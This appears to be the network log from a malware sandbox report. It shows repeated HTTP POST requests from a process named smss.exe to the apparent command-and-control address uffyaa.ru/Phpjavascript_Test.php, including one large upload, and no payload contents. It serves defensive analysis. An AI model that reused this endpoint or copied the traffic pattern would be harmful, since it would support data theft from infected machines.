                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 2092
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:02:16 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y4qpsrTHEwa9MOwmAl7btFBhn2AoN0tqIlG5Wun%2BkS6gSIOwdRAeVOfLPm4kRjCGjGVnoIt2OMuIc04y32FKYyUO5sdhtEJ%2FT6ySydAcuNe%2FERqTAz8dNBFlZlE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc2b86c5c88a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=67259&min_rtt=47954&rtt_var=16983&sent=128&recv=123&lost=0&retrans=0&sent_bytes=30342&recv_bytes=54103&delivery_rate=56413&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 2092
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:02:18 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iF34%2F45t%2FUa4fSVlrX7QUEwHulZC%2BB3s%2FvUEU%2BpvMRjEjk2lel20r6VrukWsbmJCZvSYR2R4n0O9%2BFUDslCQedjICirCmF3FjMrS8NLV9Iqvx6u31Yo4oR51r%2F4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc2c0390388a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=66239&min_rtt=47954&rtt_var=14779&sent=136&recv=128&lost=1&retrans=2&sent_bytes=31368&recv_bytes=56438&delivery_rate=56413&cwnd=1&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 2052
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:02:21 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y3wjfkm6GNcQMuMoY9BsanLTFeys6UKI8ogMMP4dSH2a%2FlZsFFWX3bwcCX4bI3Osd%2Fp2uGVM5ldpeEJ3JuVI215WE%2F4bvCFZ7%2BziIwCW9IRCGUceYv429jiL%2BdA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc2d4f88e88a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=64309&min_rtt=47954&rtt_var=14799&sent=143&recv=133&lost=0&retrans=5&sent_bytes=33357&recv_bytes=58733&delivery_rate=26714&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 2092
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:02:22 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9kc2CFgml6UteI%2B%2B1ABwn4YFaBlP2vwUR0cfmFZwuhik0tHh59SB5ZqZfkZN2Ykuj%2FhA2cbj9cexYtya9Ay%2Fcv9d3X5CV1ykVkbC8Dgn9qX4Wn5zIH%2BgnYk4c3E%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc2dcec5a88a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=63417&min_rtt=47954&rtt_var=9696&sent=147&recv=137&lost=0&retrans=5&sent_bytes=34337&recv_bytes=61068&delivery_rate=47005&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 2092
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:02:24 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wCz2BqZqbWpGjuOVTAYKuRQjQ%2BrLS8WvThZUeZhOWLVRt71MIgZoVvFham6ZTIGbDPFUAWxwcVFEy%2F1u9Iw66vHL6VQqfkdOyNqeUBDe%2B1OOAUeOSpW8JVJv%2B%2BE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc2e4a86b88a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=64220&min_rtt=47954&rtt_var=8878&sent=153&recv=142&lost=0&retrans=6&sent_bytes=35341&recv_bytes=63403&delivery_rate=47005&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 2092
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:02:25 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5bbtE%2F7XT3xE%2F7dJh%2BAFvfZq2dKC2QY5vbALc%2FrKSvOplU90WX%2FnkVdfapcYNx7xzZnnnRmoXtziSyX58qb1aFCeTf2TguPiGta95cLfpj%2B2QZ5YqEa5H673hi8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc2ef6f6d88a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=63764&min_rtt=47954&rtt_var=7046&sent=158&recv=146&lost=0&retrans=6&sent_bytes=36320&recv_bytes=65738&delivery_rate=47245&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 2092
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:02:27 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VNGQOxZNvGaaWgcAifnjoB7IUc4J6dn3qEQuke9IljDU1p49cKPAf1qhuq%2F5g0NG0Jr6AntDkQNmlxb8G6FJiBOwxBQDRBmL%2BX6v1fW20IfaMrux9XB3Ay10i6U%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc2fdba7588a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=62785&min_rtt=47954&rtt_var=5890&sent=162&recv=149&lost=0&retrans=6&sent_bytes=37301&recv_bytes=68073&delivery_rate=50462&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 2064
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:02:28 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jYiGjzxqUV4Y5f605Xabw2MGG0idpwCzPtRJwP4wQV%2Fna4mx6cLzcKZNeagReuPc9AIFTckoCX47MY9UtkJvrlbnjI7XMmM1REbBDSwz%2BB46T7tBpCBKEj76L6c%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc305ce1188a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=61169&min_rtt=47954&rtt_var=5191&sent=167&recv=153&lost=0&retrans=6&sent_bytes=38274&recv_bytes=70380&delivery_rate=51655&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 122244
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:02:31 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8pjbO%2B6U1O3DACV3kLtM%2BeobvvZkGwsmS1dqkVbpjj86nQxtstmsrOh2TvNs9NWAB9cGDBTmkw%2BgToymc1LR5uk%2FHtAtWdjCuOKs3OOz%2Fcd2iy4ZjblvpIXUCUU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc3088a0f88a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=60271&min_rtt=47954&rtt_var=5253&sent=241&recv=246&lost=0&retrans=7&sent_bytes=39252&recv_bytes=192869&delivery_rate=51655&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 2092
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:02:32 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T4xE2ncm6BtFzJxw%2Bcy7LBCOhnHliYS1Mnj25RNjkkzle9jDGdfq0KhFDjLJ6o%2FwYT%2FbSsaoH7IfYUCTBQk2Xg3gBjv8GwdJ9LeQWeTh%2FDVdqMaHxUJ1WEdDoyo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc31e598288a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=58652&min_rtt=47954&rtt_var=5293&sent=246&recv=250&lost=0&retrans=7&sent_bytes=40083&recv_bytes=195204&delivery_rate=51702&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 2092
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:02:34 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DVwCPP%2B0tVewcVwkeTdxVY%2F34CCg4jHusHB6S3KHczmgRkJP%2BCrIcamGwfOoUyT%2BcgwAAGr8vYUQIbZrXkWizIYE91O%2FXdJkXeLrfzsPDEj7CtMJzjhMXAg6IFA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc3260bfc88a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=57848&min_rtt=47954&rtt_var=5328&sent=253&recv=255&lost=0&retrans=8&sent_bytes=41086&recv_bytes=197539&delivery_rate=51971&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 2092
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:02:35 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UH5wZqO15s0ca99HZgRseDIaU1KNO00gYfihOFiJaiw2rtNU0cOkbvVste6IRhe5iu6VnpiIkZfdaYTE5CKuLpIRUy%2FZIbpsnK1JVQ8U3cFGZrvUMwU4D7MjWig%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc32fcb2588a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=59920&min_rtt=47954&rtt_var=7433&sent=258&recv=259&lost=0&retrans=8&sent_bytes=42066&recv_bytes=199874&delivery_rate=51971&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 2092
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:02:36 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ysr15PwNB%2FzKEjeZsckwzV1GEqBt213CfUrPp28cxGACRrjD2%2BYc9BzUKYyhh5ujb1lfeXV5Ynxfdwe1y0yvYankGicU8G1eBo4gDQad9nOEeh%2BZrpL7MLbwGd4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc337cf6988a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=59382&min_rtt=47954&rtt_var=5544&sent=262&recv=263&lost=0&retrans=8&sent_bytes=43038&recv_bytes=202209&delivery_rate=51971&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 2092
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:02:38 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gdvo5guLRLf74AyfKllkEGhgF7uveHyh9lHzyOXQwaVmfA8tsHRAyx6ZIJCeZjO3Lf%2BMRF6TiBjIekaAYbaXdy1wa8mftXYW3tS3rN%2Fb1rLJ9qVcJtCFysQXUe8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc33fba9b88a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=58906&min_rtt=47954&rtt_var=5857&sent=266&recv=267&lost=0&retrans=8&sent_bytes=44014&recv_bytes=204544&delivery_rate=51971&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 2092
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:02:39 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7aYsTEFPoh7NshQ4a2xelWrw160YQ3IjzDOEL8R5ojEULuOsP2R2OvVQ82%2Fy6XSJOdOYGes4zjrAz0Atyj77sAfBLuIwiyP%2Fsa9oV%2FBSSBkQ4XEX%2Bl24Qx%2FR2%2FM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc3479e0988a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=57259&min_rtt=47954&rtt_var=5902&sent=270&recv=271&lost=0&retrans=8&sent_bytes=44988&recv_bytes=206879&delivery_rate=52382&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 2092
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:02:41 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9gYE4kPMuLpusFpTGoEgUOxxzHUW43KEWTHcpOXOWHQUlaMj%2Fp47oI30gD2O12uV2kamD%2Fg1iVwGT1tuAS%2BmSdj%2F7PS2%2F%2FlxIHFpZ5itnsUwD77vzLeJm%2BJl8%2FE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc351eed988a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=55392&min_rtt=47954&rtt_var=5997&sent=274&recv=275&lost=0&retrans=8&sent_bytes=45970&recv_bytes=209214&delivery_rate=55734&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 2092
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:02:42 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PqM5FI3wu3wKARFSTFplrwmjyqTNy54ZY7%2BrTjSiwnL0Wu4%2FWyevq0SdOVcx5WkgUSLvTZkJ938yhOAXX5Unep0SG1bY6G%2F6YyVyppBWzY%2B6mqLecJ4YiLAU8%2F0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc35989d288a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
